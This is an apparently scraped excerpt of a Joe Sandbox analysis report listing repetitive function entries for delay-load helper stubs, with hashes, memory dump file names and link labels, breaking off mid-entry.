API String ID: 1269201914-0
Opcode ID: 745958a0b68e4e52248df0bc9b983bd7b3b76a8af3d55f8986112ea8b3bb0fb9
Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
Opcode Fuzzy Hash: 745958a0b68e4e52248df0bc9b983bd7b3b76a8af3d55f8986112ea8b3bb0fb9
Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439

Function 00B7F3F5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 98e43cdde6bf5da7add97e2085bea6aea86d0a9cd9e48b6e7ed04ca4aaeb98a8
Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
Opcode Fuzzy Hash: 98e43cdde6bf5da7add97e2085bea6aea86d0a9cd9e48b6e7ed04ca4aaeb98a8
Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439

Function 00B7F3FF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8523e274aaa34e1f82690d009efd59f63a46a65f4c1d76339ed1e6702425fdc5
Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
Opcode Fuzzy Hash: 8523e274aaa34e1f82690d009efd59f63a46a65f4c1d76339ed1e6702425fdc5
Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439

Function 00B7F3EB Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3329bccb84ca4aefcd11c125a8092ccca6e39ebebf29c022954e24cfade2ce84
Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
Opcode Fuzzy Hash: 3329bccb84ca4aefcd11c125a8092ccca6e39ebebf29c022954e24cfade2ce84
Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439

Function 00B7F3D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 653d54b2602761462b6c02fde87dde393c4adaeebb41b42e723715b20192bbef
Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
Opcode Fuzzy Hash: 653d54b2602761462b6c02fde87dde393c4adaeebb41b42e723715b20192bbef
Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439

Function 00B7F373 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 189ce7583d85122aab86106ee1126d2efde49b2c3282b872aad7d327e576a5f9
Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
Opcode Fuzzy Hash: 189ce7583d85122aab86106ee1126d2efde49b2c3282b872aad7d327e576a5f9
Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439

Function 00B7F431 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b5c40d308b0451e7ad7e71cd1d69914dec91676f93f9feceaffce26465d9ffcf
Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
Opcode Fuzzy Hash: b5c40d308b0451e7ad7e71cd1d69914dec91676f93f9feceaffce26465d9ffcf
Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439

Function 00B7F427 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e3cd55a78214266f28fde5868b2a4fe7bf36b77c792d422e3f5193014afe6687
Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
Opcode Fuzzy Hash: e3cd55a78214266f28fde5868b2a4fe7bf36b77c792d422e3f5193014afe6687
Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439

Function 00B7F41D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e27efad56ef5bbcfa5cbc186f71a543c021ed86c9f5c39fb215a9a3c8bc62af4
Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
Opcode Fuzzy Hash: e27efad56ef5bbcfa5cbc186f71a543c021ed86c9f5c39fb215a9a3c8bc62af4
Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439

Function 00B7F409 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ccbfd57b668ae0885a58718e30d26a48d27a196bca4952339136ef8902ca988f
Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
Opcode Fuzzy Hash: ccbfd57b668ae0885a58718e30d26a48d27a196bca4952339136ef8902ca988f
Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439

Function 00B7F5A0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F556

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8e804f184633c87d13f6f5c12a6de0312b494af43068dedd20d7e92de901bc94
Instruction ID: 1ce5319efe9ec8a2af34937893fda803d74e8246334bce1f8608564be16cb95f
Opcode Fuzzy Hash: 8e804f184633c87d13f6f5c12a6de0312b494af43068dedd20d7e92de901bc94
Instruction Fuzzy Hash: 09A001D66A9103BE76086662BD9BD3A029DC5D8BA1330C9BAF56A850A2A9809C45103A

Function 00B7F596 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F556

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 934999eddce744bd76cd8a0fd7b0126a80fae1cace6df1efd208dc3d58b738c3
Instruction ID: 1ce5319efe9ec8a2af34937893fda803d74e8246334bce1f8608564be16cb95f
Opcode Fuzzy Hash: 934999eddce744bd76cd8a0fd7b0126a80fae1cace6df1efd208dc3d58b738c3
Instruction Fuzzy Hash: 09A001D66A9103BE76086662BD9BD3A029DC5D8BA1330C9BAF56A850A2A9809C45103A

Function 00B7F58C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F556

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ae835c2ad6560cc240d7d2661f18349146d784389f9cc38552272caff58512f5
Instruction ID: 1ce5319efe9ec8a2af34937893fda803d74e8246334bce1f8608564be16cb95f
Opcode Fuzzy Hash: ae835c2ad6560cc240d7d2661f18349146d784389f9cc38552272caff58512f5
Instruction Fuzzy Hash: 09A001D66A9103BE76086662BD9BD3A029DC5D8BA1330C9BAF56A850A2A9809C45103A

Function 00B7F564 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F556

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 167328d109b35d822396555ff930f173c6c76dd5d69912e14b855c436e2b5712
Instruction ID: 1ce5319efe9ec8a2af34937893fda803d74e8246334bce1f8608564be16cb95f
Opcode Fuzzy Hash: 167328d109b35d822396555ff930f173c6c76dd5d69912e14b855c436e2b5712
Instruction Fuzzy Hash: 09A001D66A9103BE76086662BD9BD3A029DC5D8BA1330C9BAF56A850A2A9809C45103A

Function 00B7F56E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F556

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c450ff22135144d9d26b7f672a7c9ac2e8a5de03136f2100c53e6adc4325ce6a
Instruction ID: 1ce5319efe9ec8a2af34937893fda803d74e8246334bce1f8608564be16cb95f
Opcode Fuzzy Hash: c450ff22135144d9d26b7f672a7c9ac2e8a5de03136f2100c53e6adc4325ce6a
Instruction Fuzzy Hash: 09A001D66A9103BE76086662BD9BD3A029DC5D8BA1330C9BAF56A850A2A9809C45103A

Function 00B7F549 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F556

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 35a5e6f98a31daaf0a5ebd5940183ebc10ea29ea85d3b3e1f2c3bd674a1c5094
Instruction ID: 2d5089bd8a88f7b4ef9d04bbf13b5a950b5fa4f5d06627ca1c702090e821d9cd
Opcode Fuzzy Hash: 35a5e6f98a31daaf0a5ebd5940183ebc10ea29ea85d3b3e1f2c3bd674a1c5094
Instruction Fuzzy Hash: D1A011C22A80023E32082A22BE8BC3A028EC0C0B20330C0BAF028800A2A8808C00003A

Function 00B7F6F5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0dc3aeeb4e0cab64eac1efb4ea970be32350dec0f038ba9110bd3cc9fb492b94
Instruction ID: 7eeaf37b03972a001dfc9491853405cd8b516d529d6334646acb4690dba4c54c
Opcode Fuzzy Hash: 0dc3aeeb4e0cab64eac1efb4ea970be32350dec0f038ba9110bd3cc9fb492b94
Instruction Fuzzy Hash: 81A001962BD103BD760862626D9BD3A029DC4C8B65730C9BAF52A940A2A8819C456539

Function 00B7F6FF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
